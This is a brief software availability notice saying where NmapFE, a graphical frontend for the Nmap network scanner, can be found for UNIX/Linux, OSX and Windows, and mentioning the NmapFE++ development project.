NmapFE for UNIX/Linux is included in the Nmap source. NmapFE for OSX is available at http://faktory.org/m/software/nmap/ NmapFE for Windows is under development as part of NmapFE++, a new frontend for Linux, OSX and Windows. Information is available at http://www.insecure.org/nmap/SoC/NmapFE.html